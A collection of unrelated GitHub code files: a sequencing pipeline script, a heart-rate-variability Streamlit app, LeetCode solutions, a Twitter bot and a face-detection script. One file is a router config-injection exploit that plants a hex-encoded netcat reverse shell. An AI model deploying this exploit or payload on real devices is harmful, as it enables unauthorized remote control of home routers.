dict(config.items('config_section'))\n\nif __name__ == \"__main__\":\n config_file = None\n\n try:\n opts, args = getopt.getopt(sys.argv[1:], \"c:h\", [\"config=\"])\n except getopt.GetoptError as err:\n print(err)\n usage()\n sys.exit(2)\n\n for o, a in opts:\n if o in (\"-c\", \"--config\"):\n config_file = a\n elif o in (\"-h\", \"--help\"):\n usage();\n sys.exit()\n else:\n assert False, \"Unknown option\"\n sys.exit(-1)\n\n props = read_properties_file(config_file)\n\n genome_type = props['genome_type']\n is_paired = props['is_paired']\n is_dropseq = props['is_dropseq']\n fastqs_input_dir = props['fastqs_input_dir']\n pipeline_dir = props['pipeline_dir']\n experiment = props['experiment']\n preprocess_dir = pipeline_dir +'/preprocess/' +experiment\n script_dir = pipeline_dir +'/scripts'\n config_dir = pipeline_dir +'/config'\n\n batch_size_str = props.get(\"batch_size\")\n\n if batch_size_str is None:\n batch_size = 100 #default number\n else:\n batch_size = int(props['batch_size'])\n\n\n print(preprocess_dir)\n #dir_path = os.path.dirname(os.path.realpath(__file__))\n\n individual_dirs = os.listdir(fastqs_input_dir)\n individual_dirs.sort()\n\n script_template = Template('$SCRIPT_DIR/preprocess/preprocess.sh -g $genome_type -p $is_paired -d is_dropseq -s $PIPELINE_DIR -i '\n '$FASTQS_INPUT_DIR/$individual -o $PREPROCESS_DIR/$individual '\n '-f $FASTQS_INPUT_DIR/$individual/$fastqs')\n multiqc_template = Template('multiqc $FASTQS_INPUT_DIR/$individual/fastQC_output $FASTQS_INPUT_DIR/$individual/star_output'\n ' $FASTQS_INPUT_DIR/$individual/htseqCount_output --filename $individual_multiqc_report.html')\n count=0\n jobname='runPreprocessJob.sh'\n job=open(jobname,'w')\n job.write('#!/bin/bash\\n\\n')\n\n multiqc_jobname=\"runMultiQCJob.sh\"\n multiqc_job=open(multiqc_jobname,'w')\n multiqc_job.write('#!/bin/bash\\n\\n')\n\n for individual in 
individual_dirs:\n if os.path.isdir(os.path.join(fastqs_input_dir,individual)):\n print(\"individual=\"+individual)\n multiqc_filename='runMultiqc_'+individual +'.sh'\n multiqc_file=open(multiqc_filename, \"w\")\n multiqc_file.write('#!/bin/bash\\n\\n')\n multiqc_file.write(multiqc_template.safe_substitute(FASTQS_INPUT_DIR=fastqs_input_dir, individual=individual))\n multiqc_file.close()\n multiqc_job.write('SBATCH ' + multiqc_filename + '\\n')\n\n fastqarr=[]\n #init fastq array\n for file in os.listdir(os.path.join(fastqs_input_dir,individual)):\n if file.endswith(\".fastq\"):\n fastqarr.append(file)\n fastqarr.sort()\n\n #split fastq array based on the batch size\n i=0\n print(\"fastqarr=\"+str(fastqarr))\n while i\n [data-testid=\"stForm\"] {border: 0px}\n \n'''\n\nst.markdown(css, unsafe_allow_html=True)\n\n\ndef load_data(file):\n if file.name.endswith('.csv'):\n if 'heartbeat' in file.name:\n df = pd.read_csv(file, index_col=0, parse_dates=True)\n if 'inter' in file.name:\n df = pd.read_csv(file)\n df['timestamp'] = pd.to_datetime(df['timestamp'])\n df['inter_beat_interval'] = df['inter_beat_interval'].astype(int)\n \n\n elif file.name.endswith('.parquet'):\n df = pd.read_parquet(file)\n # print(df)\n # if 'timestamp'\n else:\n raise ValueError(\"Unsupported file type: \" + file.name)\n\n # Ask for the HRV column name\n\n # if col_name not in df.columns:\n # default_col_name = 'inter_beat_interval'\n # col_name = st.text_input(\"HRV column name\", default_col_name)\n # st.error(f\"{col_name} is not a valid HRV column name, aborting.\")\n # st.stop()\n\n\n \n # if 'timestamp' not in df.columns:\n # st.error(f\"No timestamp found, aborting.\")\n # st.write(df.columns)\n # st.stop()\n # else:\n # print(df.index.dtype)\n if not str(df.index.dtype).startswith('datetime64'):\n print('Indexing timestamp')\n df = df.set_index('timestamp')\n\n st.write(df.head())\n # st.table(df.head())\n col_name = 'inter_beat_interval'\n return df, col_name\n\n# Processing inter_beat_intervals\ndef process_ibi(loc):\n candidates=['timestamp','value','bytes']\n\n # Value to Byte Array\n inter_beat_intervals = pd.read_csv(loc)\n inter_beat_intervals['bytes'] = inter_beat_intervals['value'].apply(lambda x: bytearray.fromhex(x))\n inter_beat_intervals = pd.DataFrame.from_dict(timestamp_conversion(inter_beat_intervals),orient='index')\n\n if 'datetime' in inter_beat_intervals:\n inter_beat_intervals.rename(columns={'datetime':'timestamp'},inplace=True)\n\n inter_beat_intervals = inter_beat_intervals.set_index('timestamp')\n inter_beat_intervals = inter_beat_intervals.drop([x for x in candidates if x in inter_beat_intervals.columns], axis=1)\n\n inter_beat_intervals = inter_beat_intervals.sort_index()\n return inter_beat_intervals\n\ndef timestamp_conversion(df):\n\n last_ibi = 0\n i = 0\n ibi_df = {}\n for index, row in df.iterrows():\n heartbeats = row['value']\n timestamp = row['timestamp']\n timestamp = str(int(timestamp) * 1000)\n frame_heartbeat_count = int(heartbeats[1:2])\n quality_indicator = int(heartbeats[5])\n if frame_heartbeat_count > 1:\n for heartbeat_index in range(1,frame_heartbeat_count+1): \n index_start = 3+(heartbeat_index-1)*8\n index_end = index_start + 4\n time_bytes = heartbeats[index_start*2:index_end*2]\n time_hex = bytearray.fromhex(time_bytes)\n ibi = int.from_bytes(time_hex, byteorder=\"little\")\n if last_ibi > 0:\n temp = ibi\n ibi = ibi - last_ibi\n last_ibi = temp\n else:\n last_ibi = ibi\n \n\n datetime = pd.to_datetime(timestamp, unit='ms')\n if heartbeat_index == 1:\n if i == 
0:\n datetime = datetime + pd.Timedelta(milliseconds=0.01)\n ibi = 1000\n else:\n datetime = datetime + pd.Timedelta(milliseconds=0.01)\n\n else:\n datetime = datetime + pd.Timedelta(milliseconds=ibi)\n\n if ibi > 300 and ibi < 2000:\n ibi_df[i] = {'timestamp':datetime, 'inter_beat_interval': ibi, 'quality_indicator': quality_indicator}\n i += 1\n else:\n for heartbeat_index in range(1,2): \n index_start = 3+(heartbeat_index-1)*8\n index_end = index_start + 4\n time_bytes = heartbeats[index_start*2:index_end*2]\n time_hex = bytearray.fromhex(time_bytes)\n ibi = int.from_bytes(time_hex, byteorder=\"little\")\n\n if last_ibi > 0:\n temp = ibi\n ibi = ibi - last_ibi\n last_ibi = temp\n else:\n last_ibi = ibi\n datetime = pd.to_datetime(timestamp, unit='ms')\n if i == 0:\n datetime = datetime + pd.Timedelta(milliseconds=0.01)\n ibi = 1000\n else:\n datetime = datetime + pd.Timedelta(milliseconds=0.01)\n\n if ibi > 300 and ibi < 2000:\n ibi_df[i] = {'timestamp':datetime, 'inter_beat_interval': ibi, 'quality_indicator': quality_indicator}\n i += 1\n\n return ibi_df\n\n\ndef get_rhr(rr):\n hr = 60000/rr\n rhr = np.min(hr)\n return rhr\ndef timedomain(rr):\n results = {}\n\n hr = 60000/rr\n \n results['Mean RR (ms)'] = np.mean(rr)\n results['STD RR/SDNN (ms)'] = np.std(rr)\n results['Mean HR (Kubios\\' style) (beats/min)'] = 60000/np.mean(rr)\n results['Mean HR (beats/min)'] = np.mean(hr)\n results['STD HR (beats/min)'] = np.std(hr)\n results['Min HR (beats/min)'] = np.min(hr)\n results['Max HR (beats/min)'] = np.max(hr)\n results['RMSSD (ms)'] = np.sqrt(np.mean(np.square(np.diff(rr))))\n results['NNxx'] = np.sum(np.abs(np.diff(rr)) > 50)*1\n results['pNNxx (%)'] = 100 * np.sum((np.abs(np.diff(rr)) > 50)*1) / len(rr)\n return results\n\ndef remove_outliers(data, threshold='normal', size=30):\n outlier_counter = 0\n middle = size // 2\n if len(data) > size:\n for i, item in enumerate(data):\n if i < middle or i >= len(data) - middle:\n mean = np.mean(data)\n # continue # Skip first and last items\n window = data[i - middle:i + middle + 1]\n mean = np.mean(window)\n\n # Thresholding \n if threshold == 'normal':\n threshold_low = 0.5\n threshold_high = 1.5\n elif threshold == 'strict':\n threshold_low = 0.75\n threshold_high = 1.25\n elif threshold == 'loose':\n threshold_low = 0.2\n threshold_high = 1.8\n \n # Check for outliers\n if item < (threshold_low * mean) or item > (threshold_high * mean):\n data[i] = mean\n outlier_counter += 1\n\n else:\n print(f\"Window seems empty. 
Skipping...\")\n \n st.write(f\"{outlier_counter} outliers removed\")\n return data\n\ndef analyzer(df,start_time,end_time, openai_key, moments_df):\n st.title('Results') \n st.write('**Pre-Processing**')\n df_window = df.query(\"index >= @start_time and index < @end_time\")\n if moments_df is not None:\n moments_df = moments_df.query(\"index >= @start_time and index < @end_time\")\n diff = (end_time - start_time) / pd.Timedelta(minutes=1)\n print(diff)\n # This remove outliers from signal\n # rr_intervals_without_outliers = remove_outliers(rr_intervals=rr_intervals, \n # low_rri=300, high_rri=2000)\n # # This replace outliers nan values with linear interpolation\n # interpolated_rr_intervals = list(interpolate_nan_values(rr_intervals=rr_intervals_without_outliers,\n # interpolation_method=\"linear\"))\n df_window['inter_beat_interval'] = remove_outliers(df_window['inter_beat_interval'])\n df_index, df_rri = freq_psd.threshold_filter(df_window['inter_beat_interval'],threshold='strong',local_median_size=5)\n data = {'inter_beat_interval': df_rri}\n df_window = pd.DataFrame(data, index=df_index)\n # df_window['inter_beat_interval'] = freq_psd.moving_median(df_window)\n df_window['inter_beat_interval'] = df_window['inter_beat_interval'].interpolate(method='linear')\n rr_intervals = df_window['inter_beat_interval']\n\n st.write(df_window)\n\n # # Create the figure and axes objects\n # fig, ax = plt.subplots()\n\n # # Plot the rr_intervals series as a line with blue markers\n # ax.plot(rr_intervals.index, rr_intervals.values, '-o', color='blue', markersize=3)\n\n # # Set the x-axis label\n # ax.set_xlabel('Date and Time')\n\n # # Set the y-axis label\n # ax.set_ylabel('Inter-Beat Interval (ms)')\n\n # # Set the title of the plot\n # ax.set_title('Inter-Beat Intervals over Time')\n # fig = px.line(rr_intervals,markers=True)\n st.write('HRV data is unsteady - a single movement can already mess up your HRV data. 
Use this plot to see whether your data is messy, usually denoted by straight lines')\n st.line_chart(rr_intervals)\n # st.table(rr_intervals.head())\n # st.table(df_window.head())\n timedomain_values = timedomain(rr_intervals)\n\n\n\n\n\n # if ibi_df.index.duplicated().sum() == 0:\n\n # st.write(timedomain_values)\n time_df = pd.DataFrame.from_dict(timedomain_values,orient='index',columns=['value'])\n # st.write(time_df)\n st.write('**Time Domain**')\n st.table(time_df)\n\n st.write(\"*RMSSD Trend*\")\n rmssd = rr_intervals.rolling('5min',center=True).apply(freq_psd.do_rmssd)\n rmssd_trend = freq_psd.get_trend_line(rmssd)\n\n rmssd_fig, ax = plt.subplots(figsize=(20,10))\n ax.plot(rmssd.index, rmssd.values, '-',label='rmssd')\n ax.plot(rmssd.index, rmssd_trend.values, '-',label='trend')\n ax.set_ylabel('Value (ms)', color = 'black')\n ax.set_xlabel('Time', color = 'black')\n ax.legend(loc='best')\n\n if moments_df is not None:\n if not moments_df.empty:\n ymin, ymax = ax.get_ylim()\n for moment in moments_df.index:\n ax.axvline(x=moment, ymin=ymin, ymax=ymax, color='red', alpha=0.8)\n # ax.text(0.5, -0.1, 'MOMENT', transform=ax.transAxes, ha='center', va='center')\n ax.text(moment, ymin-0.1*(ymax-ymin), 'MOMENT', ha='center', va='center', color='red')\n\n handles, labels = ax.get_legend_handles_labels()\n handles.append(ax.axvline(x=moments_df.index[0], ymin=0, ymax=1, color='red'))\n labels.append('moment')\n ax.legend(handles, labels, loc='best')\n\n\n st.pyplot(rmssd_fig)\n rmssd_fig.clf()\n ax.cla()\n\n st.write(\"*RHR calculated using HRV*\")\n\n rhr = rr_intervals.rolling('1min',center=True).apply(get_rhr).rolling('5min').mean()\n rhr_trend = freq_psd.get_trend_line(rhr)\n rhr_fig, ax = plt.subplots(figsize=(20,10))\n ax.plot(rhr.index, rhr.values, '-',label='resting heart rate')\n ax.plot(rhr.index, rhr_trend.values, '-',label='trend')\n ax.set_ylabel('Value (bpm)', color = 'black')\n ax.set_xlabel('Time', color = 'black')\n ax.legend(loc='best')\n\n\n # if not moments_df.empty:\n # ymin, ymax = ax.get_ylim()\n # for moment in moments_df.index:\n # ax.axvline(x=moment, ymin=ymin, ymax=ymax, color='red', alpha=0.8)\n # # ax.text(0.5, -0.1, 'MOMENT', transform=ax.transAxes, ha='center', va='center')\n # ax.text(moment, ymin-0.1*(ymax-ymin), 'MOMENT', ha='center', va='center', color='red')\n # handles, labels = ax.get_legend_handles_labels()\n # handles.append(ax.axvline(x=moments_df.index[0], ymin=0, ymax=1, color='red'))\n # labels.append('moments')\n # ax.legend(handles, labels, loc='best')\n\n st.pyplot(rhr_fig)\n\n ##################################### \n\n frequency_values = get_frequency_domain_features(rr_intervals)\n for key in frequency_values:\n # rounding to K using round()\n # if key != 'lf_hf_ratio':\n frequency_values[key] = '{:.2f}'.format(frequency_values[key]).rstrip('0').rstrip('.')\n\n\n st.write('**Frequency Domain**')\n freq_df = pd.DataFrame.from_dict(frequency_values,orient='index',columns=['value'])\n\n # def get_lf_hf(window):\n # window = list(window)\n # frequency_domain_features = get_frequency_domain_features(nn_intervals = window)\n # return frequency_domain_features['lf_hf_ratio']\n \n \n # lf_hf = rr_intervals.rolling('5min',center=True).apply(get_lf_hf)\n # lfhf_trend = freq_psd.get_trend_line(lf_hf)\n # fig, ax = plt.subplots(figsize=(20,10))\n # ax.plot(lf_hf.index, lf_hf.values, '-',label='lf hf')\n # ax.plot(lf_hf.index, lfhf_trend.values, '-',label='trend')\n # ax.set_ylabel('Value (bpm)', color = 'black')\n # ax.set_xlabel('Time', color = 
'black')\n # ax.legend(loc='best')\n # st.pyplot(fig)\n\n st.table(freq_df)\n freq_psd.plot_psd(rr_intervals, method=\"welch\")\n \n # if st.button('start configuration'):\n # st.session_state['step'] = 1\n # if st.session_state['step'] == 1:\n # with st.form('my form'):\n # st.session_state['number'] = st.number_input('choose a number', 1, 13)\n # if st.form_submit_button(\"save configuration\"): \n # st.session_state['step'] = 2\n # st.experimental_rerun() # form should not be shown after clicking 'save' \n \n\n # with st.form(key=\"chatgpt\"):\n # _, _, _, col, _, _, _ = st.columns([1]*6+[1])\n # run_chat = st.form_submit_button(\"Ask ChatGPT about my score\", disabled=(freq_df is None))\n # submitted = st.form_submit_button(\"Start analyzing\")\n # if run_chat:\n\n # st.write(timedomain_values['RMSSD (ms)'], frequency_values['lf'], frequency_values['hf'],frequency_values['lf_hf_ratio'])\n if openai_key:\n if not freq_df.empty and not time_df.empty:\n\n def show_messages(text):\n messages_str = [\n f\"{_['role']}: {_['content']}\" for _ in st.session_state[\"messages\"][1:]\n ]\n text.text_area(\"Messages\", value=str(\"\\n\".join(messages_str)), height=400)\n\n\n openai.api_key = openai_key\n BASE_PROMPT = [{\"role\": \"system\", \"content\": \"You are a helpful assistant.\"}]\n\n if \"messages\" not in st.session_state:\n st.session_state[\"messages\"] = BASE_PROMPT\n\n st.header(\"ChatGPT HRV Analysis\")\n # st.markdown(\"\"\"---\"\"\")\n\n # text = st.empty()\n # show_messages(text)\n # ']])\n print(timedomain_values['RMSSD (ms)'])\n rmssd_ms = int(float(timedomain_values['RMSSD (ms)']))\n lf = int(float(frequency_values['lf']))\n hf = int(float(frequency_values['hf']))\n lf_hf = frequency_values['lf_hf_ratio']\n prompt = f\"Tell me about my HRV: RMSSD (ms): {rmssd_ms} and my LF, HF, and LF HF Ratio in Hz: , {lf, hf,lf_hf}. The total time of measurement was {diff} minutes. Don't use more than 200 words. Keep it simple and motivating, very positive. Explain how it relates to mental balance. Always display the values.\"\n # st.write(len(prompt))\n # if st.form_submit_button(\"Send\"):\n with st.spinner(\"Generating response...\"):\n st.session_state[\"messages\"] += [{\"role\": \"user\", \"content\": prompt}]\n response = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\", messages=st.session_state[\"messages\"],\n temperature=0.3,\n max_tokens=500,\n\n\n )\n message_response = response[\"choices\"][0][\"message\"][\"content\"]\n # st.session_state[\"messages\"] += [\n # {\"role\": \"system\", \"content\": message_response}\n # ]\n # show_messages(text)\n st.write(message_response)\n\n if st.form_submit_button(\"Clear\"):\n prompt = \"\"\n # st.session_state[\"messages\"] = BASE_PROMPT\n # show_messages(text)\n # Display the bar chart using st.bar_chart\n # st.bar_chart(lf_hf_df)\n # st.bar_chart(freq_df.iloc['lf','hf']])\n # st.write('Plotting!')\n # st.write(time)\n\n\ndef get_time_range(df, timezone):\n # Convert the datetime index to the selected timezone\n \n df.index = df.index + timedelta(hours=timezone)\n \n # Get the start and end datetime values as strings\n start_time = df.index.min().strftime('%Y-%m-%d %H:%M:%S %Z%z')\n end_time = df.index.max().strftime('%Y-%m-%d %H:%M:%S %Z%z')\n \n return start_time, end_time\n\ndef main():\n df = None\n end_datetime = None\n # st.title(\"HRV Analyzer\")\n st.markdown(\"
HRV Analyzer\", unsafe_allow_html=True)\n st.markdown(\"NOWATCH\", unsafe_allow_html=True)\n st.markdown(\"
    Lennart Zegerius\", unsafe_allow_html=True)\n st.write('\\n')\n st.markdown(\"\"\"---\"\"\")\n format = st.radio(\n \"Uploading CSV or Parquet? (Large files? Use parquet)\",\n ('CSV', 'Parquet'))\n\n st.write('UPDATE 2023-04-18: \\nFile loading may take a little longer due to some extra checks on the data. Be patient :-)')\n if format == 'Parquet':\n file = st.file_uploader(\"Upload a parquet file containing interbeat intervals. \",type='parquet')\n if file is not None:\n df, hrv_col = load_data(file)\n # st.table(df.head())\n else:\n file = st.file_uploader(\"Upload a csv file containing interbeat intervals. \",type='csv')\n \n if file is not None and file.name.startswith('heart'):\n df = process_ibi(file)\n elif file is not None and file.name.startswith('inter'):\n df, hrv_col = load_data(file)\n\n\n # st.table(df.head())\n # st.write(\"You didn\\'t select comedy.\")\n # file = st.file_uploader(\"Upload a parquet file containing interbeat intervals. \")\n # csv_file = st.file_uploader(\"Upload hearbeats.csv\")\n if df is not None:\n \n \n # st.write(df.index.dtype)\n # dates = pd.to_datetime(df.index)\n # st.write(dates.dtype)\n\n timezone = 0\n df.index = df.index + timedelta(hours=timezone)\n timezone = st.slider('Timezone (UTC)', min_value=-12, max_value=12, step=1, value=0)\n df.index = df.index + timedelta(hours=timezone)\n st.write(\"Date: \",df.index.min(), \" - \", df.index.max())\n # st.write(\"End datetime: \",df.index.max())\n\n\n Date = df.index.unique().tolist()\n\n min_value = datetime.strptime(min(Date).strftime('%Y-%m-%d %H:%M:%S'), '%Y-%m-%d %H:%M:%S') # str to datetime\n max_value = datetime.strptime(max(Date).strftime('%Y-%m-%d %H:%M:%S'), '%Y-%m-%d %H:%M:%S')\n value = (min_value, max_value)\n # st.write(df.index.max())\n# st.write(min_value.dtype)\n \n # Model = st.slider(\n # 'Pick a RR-interval window:',\n # min_value=min_value,\n # max_value=max_value,\n # format = \"HH:mm\",\n # step = timedelta(minutes=2),\n # value=value,\n # )\n\n\n # selmin, selmax = Model\n selmind = min_value.strftime('%H:%M') # datetime to str\n selmaxd = max_value.strftime('%H:%M')\n \n # st.write('Or pick a time here')\n\n unique_dates = np.unique(df.index.date)\n start_date = st.selectbox(options=unique_dates,label='Start Date:')\n start_time = st.text_input(label='Start Time:',placeholder=selmind)\n start_datetime_str = f\"{start_date} {start_time}\"\n if len(start_time) == 5:\n start_datetime = datetime.strptime(start_datetime_str, '%Y-%m-%d %H:%M')\n # st.write(start_date, start_time)\n\n if start_time:\n end_date = st.selectbox(options=unique_dates,label='End Date:',index=len(unique_dates)-1)\n end_time = st.text_input(label='End Time:',placeholder=selmaxd)\n # Concatenate the end date and end time strings\n end_datetime_str = f\"{end_date} {end_time}\"\n if len(end_time) == 5:\n end_datetime = datetime.strptime(end_datetime_str, '%Y-%m-%d %H:%M')\n\n # st.write(end_date, end_time)\n\n if end_time:\n openai_key = st.text_input(label='OpenAI API Key (optional): ',placeholder=\"...\")\n moments = st.file_uploader(\"Upload Moments (optional): \",type='csv')\n if moments is not None:\n filename = str(moments.name)\n\n if 'system' in filename:\n moments_df = pd.read_csv(moments).drop('value',axis=1)\n moments_df['timestamp'] = pd.to_datetime(moments_df['timestamp'],unit='s')\n moments_df = moments_df[moments_df['type'] == 'MOMENT']\n moments_df = moments_df.set_index('timestamp')\n moments_df.index = moments_df.index + timedelta(hours=timezone)\n if not moments_df.empty:\n MOMENTS = 
True\n st.write(moments_df)\n elif 'moment' in filename: \n if moments is not None:\n moments_df = pd.read_csv(moments).drop('value',axis=1).set_index('timestamp')\n moments_df = moments_df[moments_df['type'] == 'MOMENT']\n moments_df.index = pd.to_datetime(moments_df.index) + timedelta(hours=timezone)\n if not moments_df.empty:\n MOMENTS = True\n st.write(moments_df)\n else:\n st.write(\"No moments found\")\n moments_df = None\n else:\n moments_df = None\n st.markdown(\"\"\"---\"\"\")\n \n st.write('\\n')\n\n st.write('\\n')\n if start_time and end_time:\n st.write(\"Selected window:\", start_datetime, \" - \", end_datetime)\n # st.write(selmax)\n \n with st.form(key=\"my_form\"):\n _, _, _, col, _, _, _ = st.columns([1]*6+[1])\n submitted = col.form_submit_button(\"Start analyzing\", disabled=(end_datetime is None))\n # submitted = st.form_submit_button(\"Start analyzing\")\n if submitted and start_datetime and end_datetime:\n analyzer(df, start_datetime, end_datetime, openai_key, moments_df)\n\n # st.write(\"Running analyzer...\")\n \n\nif __name__ == '__main__':\n # Set page title\n # st.set_page_config(page_title=\"HRV Dashboard\")\n # st.set_page_config(layout=\"wide\") \n # Set app URL\n # app_url = 'https://hrv.lenn.dev'\n # st.write(f'', unsafe_allow_html=True)\n main()\n","repo_name":"Lenzeg/hrv-analyzer-nowatch","sub_path":"hrv_analyzer.py","file_name":"hrv_analyzer.py","file_ext":"py","file_size_in_byte":23354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"13032305151","text":"#!/usr/bin/env python3\n# poc config injection exploit\n\nfrom Crypto.Cipher import AES\nimport hmac\nimport hashlib\n\ntry:\n\tinputkey = open (\"proc_rip_0108\", \"rb\")\nexcept:\n\tprint (\"Cannot open encryption key file ./proc_rip_0108\")\n\texit()\n\ntry:\n\tinputfile = open (\"config.bin\", \"rb\")\nexcept:\n\tprint (\"Cannot open file ./config.bin\")\n\texit()\n\n# reverse shell on 192.168.1.69:1337\npayload = \"6e63203139322e3136382e312e36392031333337202d65202f62696e2f7368207c7c2074727565\"\n\nhmac_key = inputkey.read()\naes_key = hmac_key[:32]\n\nconfig = inputfile.read()\n\nsz = len(config)\nheader_end = config.find(b\"\\n\\n\") + 2\nheader_data = config[:header_end]\niv_end = header_end + 16\naes_end = sz - 20\niv = config[header_end:iv_end]\naes_data = config[iv_end:aes_end]\nhmac_data = config[aes_end:]\n\nprint (\"File size: \" + str(sz))\nprint (\"IV \" + str(len(iv)) + \" \" + iv.hex())\nprint (\"HMAC \" + str(len(hmac_data)) + \" \" + hmac_data.hex())\nprint (\"AES data \" + str(len(aes_data)))\n\n# decrypt\ncipher_dec = AES.new (aes_key, AES.MODE_CBC, iv)\ndecrypted_raw = cipher_dec.decrypt (aes_data)\n\n# remove padding\ndecrypted = decrypted_raw[:-decrypted_raw[-1]]\ndecrypted_file = open(\"config.txt\", \"w\")\ndecrypted_file.write(decrypted.decode(\"utf-8\"))\ndecrypted_file.close()\n\n# patch\npatched = decrypted.replace (b\"wps_button_pressed.sh\", bytes.fromhex(payload))\npatch_file = open(\"config_patched.txt\", \"w\")\npatch_file.write(patched.decode(\"utf-8\"))\npatch_file.close()\n\n# add padding\npatched_len = len(patched) % 16\nif patched_len:\n\tadd_pad = 16 - patched_len\n\tpad = add_pad * chr(add_pad)\n\tpatched += bytes(pad, \"utf-8\")\n\n# encrypt\ncipher_enc = AES.new (aes_key, AES.MODE_CBC, iv)\nencrypted = cipher_enc.encrypt (patched)\n\n# calc new hmac\nhmac_new = hmac.new(hmac_key, header_data + iv + encrypted, digestmod=hashlib.sha1).digest()\n\nout = open (\"config_patched.bin\", 
\"wb\")\nout.write(header_data)\nout.write(iv)\nout.write(encrypted)\nout.write(hmac_new)\nout.close()\n\nprint (\"Written config_patched.bin\")\n\n","repo_name":"antnks/technicolor-config-decrypt","sub_path":"exploit_config.py","file_name":"exploit_config.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"19"} +{"seq_id":"35789129660","text":"#\n# @lc app=leetcode id=55 lang=python3\n#\n# [55] Jump Game\n#\n\n# @lc code=start\nclass Solution:\n def canJump(self, nums: List[int]) -> bool:\n # if len(nums) == 1:\n # return True\n furthest = 0\n\n for i in range(len(nums)):\n if furthest < i:\n return False\n furthest = max(furthest, i+nums[i])\n if furthest >= len(nums) - 1:\n return True\n return False\n \n# @lc code=end\n\n","repo_name":"dragonwood1024/practise","sub_path":"55.jump-game.py","file_name":"55.jump-game.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"18721278555","text":"class Solution(object):\n def topKFrequent(self, nums, k):\n result = []\n dict = collections.Counter(nums)\n dict = sorted(dict.items(), key=lambda x: x[1], reverse=True)\n for key, value in dict[:k]:\n result.append(key)\n return result\n \n \n","repo_name":"Isa1asN/competitive-programming","sub_path":"top_k_frequent_elements.py","file_name":"top_k_frequent_elements.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"29730633481","text":"# import sys\nimport twitter\nimport configparser as ConfigParser\nimport pandas as pd\n\ndef auto_tweets(api, msg):\n\tmessage = msg\n\tstatus = api.PostUpdate(message)\n\t\ndef auto_getUserTimeLine(api, screen_name, max_count):\n\tuser = screen_name\n\tstatuses = api.GetUserTimeline(screen_name=screen_name, count = max_count)\n\treturn statuses\n\ndef auto_favorite_auto_tweet(api, posted_tweets):\n for status in posted_tweets:\n if status.favorited == False:\n api.CreateFavorite(status_id=status.id)\n if status.retweeted == False:\n api.PostRetweet(status_id=status.id)\n\n# In case detected automated activity, do not use it.\ndef auto_reply(api, statuses, screen_name, msg):\n\tfor sts in statuses:\n\t\tapi.PostUpdate(status=\"@\"+ screen_name + \" \"+ msg, in_reply_to_status_id=sts.id)\n\ndef main():\n\tcp = ConfigParser.SafeConfigParser()\n\tcp.read('test.conf')\n\t# Later add checks here, in case test.conf do not have auth section.\n\tconsumer_key = cp.get('auth', 'consumer_key')\n\tconsumer_secret = cp.get('auth', 'consumer_secret')\n\taccess_token = cp.get('auth', 'access_token')\n\taccess_token_secret = cp.get('auth', 'access_token_secret')\n\n\tapi = twitter.Api(consumer_key=consumer_key, consumer_secret=consumer_secret, access_token_key=access_token, access_token_secret=access_token_secret)\n\tscreen_name = cp.get('user', 'screen_name')\n\tstatuses = auto_getUserTimeLine(api, screen_name, 10)\n\tprint(len(statuses))\n\t\n\t# new_since_id = \"970073708357337089\"\n\t# cp.set('user', 'since_id', new_since_id)\n\t# cp.write(open('test.conf', 'w')) \n\t# auto_reply(api, statuses, screen_name, msg)\n\t# auto_favorite_auto_tweet(api, statuses)\n\tfor status in statuses:\n\t\tprint(status)\n\n\t# writeFileName = 'status1.csv'\n\t# since_id_content = []\n\t# text_content = []\n\t# if statuses:\n\t# \twith open('userPipeline.json', 'a') as f:\n\t# \t\tfor status in 
statuses:\n\t\t\t\t\n\t# \t\t\tf.write(str(status))\n\n\t# \t\t\tsince_id_content.append(status.id)\n\t# \t\t\ttext = status.text.replace(',', ' ')\n\t# \t\t\ttext = status.text.replace('\\n', ' ')\n\t# \t\t\ttext_content.append(text)\n\t# \t\t# text_content.append(status.text)\n\t# dataframe = pd.DataFrame({'since_id':since_id_content,'text':text_content})\n\t# dataframe.to_csv(writeFileName, index=False, sep=',')\n\n\n\nif __name__ == \"__main__\":\n main()\n\n\n\n","repo_name":"ShengZhang2016/Tweet_Rob","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"27630884119","text":"import json\nfrom json.decoder import JSONDecodeError\nimport os\nimport glob\nimport cv2\nimport dlib\nfrom skimage import io\nimport pandas as pd\nimport numpy as np\nfrom urllib.parse import urlparse\n\n# Image processing (photo & thumbnail)\n\n\ndir = os.getcwd()\nin_files = glob.glob(dir+'/PrepData0313/'+'*.json')\n# in_files = dir+'/dataset0313.csv'\nimage_out_dir = dir+'/PrepImage/'\ntn_out_dir = dir+'/PrepTN/'\nlist_of_dct = []\nlist_of_dct2 = []\nunavailable_json = []\n\n# https://towardsdatascience.com/simple-face-detection-in-python-1fcda0ea648e\n# https://www.bogotobogo.com/python/OpenCV_Python/python_opencv3_Image_Object_Detection_Face_Detection_Haar_Cascade_Classifiers.php\n\n\n# Input data\n# input = pd.read_csv(in_files)\n# print(sum(pd.notnull(input['thumbnail_url']))) # 562 with photo type; # 1512 thumbnail\n\n# Load the cascade\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n\n\n\ndef detect_print(image_url, filename, out_dir):\n print(image_url)\n if image_url == 'https://external-lax3-1.xx.fbcdn.net/safe_image.php?d=AQFwNwXgZM3XiZ1R&w=698&h=698&url=https%3A%2F%2Fwww.swcbulletin.com%2Fsites%2Fdefault%2Ffiles%2Fstyles%2F16x9_1240%2Fpublic%2F1_2DMvVxOlxEkjoJViBAdWP1k5_d1ufEo.jpg%3Fitok%3D0U78mR2S&cfs=1&sx=0&sy=0&sw=698&sh=698&_nc_cb=1&_nc_hash=AQGH0XiLaHJ14MGQ':\n return\n\n try:\n # Read image from URL\n img = io.imread(image_url)\n # Turn into gray\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n # Detect faces\n faces = face_cascade.detectMultiScale(gray, 1.1, 5)\n # Draw rectangle around the faces\n for (x, y, w, h) in faces:\n cv2.rectangle(img, (x, y), (x + w, y + h), (255, 0, 0), 2)\n # Save annotated image\n 